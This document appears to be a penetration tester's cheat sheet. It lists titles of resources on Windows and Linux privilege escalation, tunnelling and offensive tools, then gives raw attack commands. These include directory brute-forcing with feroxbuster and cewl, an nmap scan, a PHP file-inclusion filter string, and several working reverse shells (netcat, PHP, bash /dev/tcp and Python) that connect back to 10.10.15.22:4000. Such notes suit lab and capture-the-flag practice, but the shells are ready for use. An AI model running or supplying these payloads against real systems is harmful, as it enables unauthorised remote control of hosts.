A collection of links and payloads I stored for quick access
- NTLM Theft
- Windows Local Privillage Escalation
- Windows Local Privillage Escalation Checklist
- Juicy Potato Exploit
- Potatoes
- Pass The Hash
- Print Spoofer
- Sweet Potato
- Druva insyncCPHwnet64.exe POC
- Druva explanation
- Apache Tomcat RCE through WAR file
- Server SideTemplate Injection Payloads
- Jenkins Pentesting
- Payloads Of All Things
- MSSQL Injection Cheatsheat
- XP_cmdshell cheatsheat
- LOCAL FILE INCLUSION
- Python Library Hijacking
- GTFO bins
- LXD Privillage Escalation
- LXD Exploatation
- Exploiting User Groups
- Escape from Restrictd Shells
- Traitor
- Python Library Hijacking on Linux
- Pivoting with Chisel
- Tunneling with Chisel and SSF 0XDF
- NOTES ABOUT TUnneling and Pivoting
- SSH Tunneling
- Shades of Tunneling Article
- Tunneling and Port FOrwarding
- Pivoting with SShuttle and ligolo-ng
- SecLists
- Responder
- Impacket
- SQL Map
- XSS Strike
- ffuf
- WinPeas
- Rogue JNDI
- RsaCtfTool
- Ghidra
- OllyDBG
- checksec
- LaZagne
- File Magic Numbers
- Rule to Rule Them ALL
sshuttle -vr balthazar@10.10.110.100 172.16.1.0/24 -x 172.16.1.100
php://filter/convert.base64-encode/resource=
1.DIRECTORY BRUTEFORCING
feroxbuster -eknr --wordlist $HOME/tools/crimson/words/dir -u https://<target_domain>/ -o ferox.txt
2. PREPARE FIRST PART OF THE cewl.txt
cat ferox.txt | grep 200 | grep -v "png\|\.js" | cut -d "h" -f2-100 | sed "s/^/h/g" >> urls.txt
for url in $(cat urls.txt); do echo $url && cewl -d 5 $url >> temp_cewl.txt;done
cat temp_cewl.txt | sort -u >> cewl.txt && rm temp_cewl.txt
nmap -n -sN 10.10.110.0/24
python -m SimpleHTTPServer
python3 -m http.server
php -S 0.0.0.0:8000
nc -lnvp 4000
nc -e /bin/sh 10.10.15.22 4000
<?php $sock = fsockopen("ip","port");$proc = proc_open("/bin/sh -i", array(0=>$sock,1=>$sock,2=>$sock),$pipes);?>
bash -i >& /dev/tcp/10.10.15.22/4000 0>&1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.22",4000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo
fg